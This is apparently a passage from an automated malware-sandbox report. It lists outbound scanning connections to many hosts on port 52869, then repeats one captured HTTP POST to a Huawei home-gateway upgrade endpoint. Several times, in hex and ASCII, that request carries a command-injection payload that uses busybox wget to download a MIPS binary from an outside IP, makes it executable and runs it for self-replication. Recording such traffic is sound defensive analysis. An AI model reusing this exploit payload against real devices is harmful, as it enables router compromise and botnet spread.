                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 130.136.141.197:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 38.47.147.236:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 168.54.72.251:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 70.59.242.166:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 42.114.143.158:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 94.221.100.187:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 34.53.37.254:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 135.23.236.194:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 70.239.61.12:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 4.194.116.48:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 25.158.237.150:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 63.150.57.125:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 135.9.168.169:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 184.112.202.180:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 13.112.9.246:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 44.70.248.184:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 159.20.45.153:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 162.63.105.168:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 105.234.100.63:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 136.74.174.143:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 4.131.130.12:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 113.34.69.120:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 37.205.238.167:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 117.27.97.229:52869
                      Source: global trafficTCP traffic: 192.168.2.23:33453 -> 106.250.20.58:52869
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 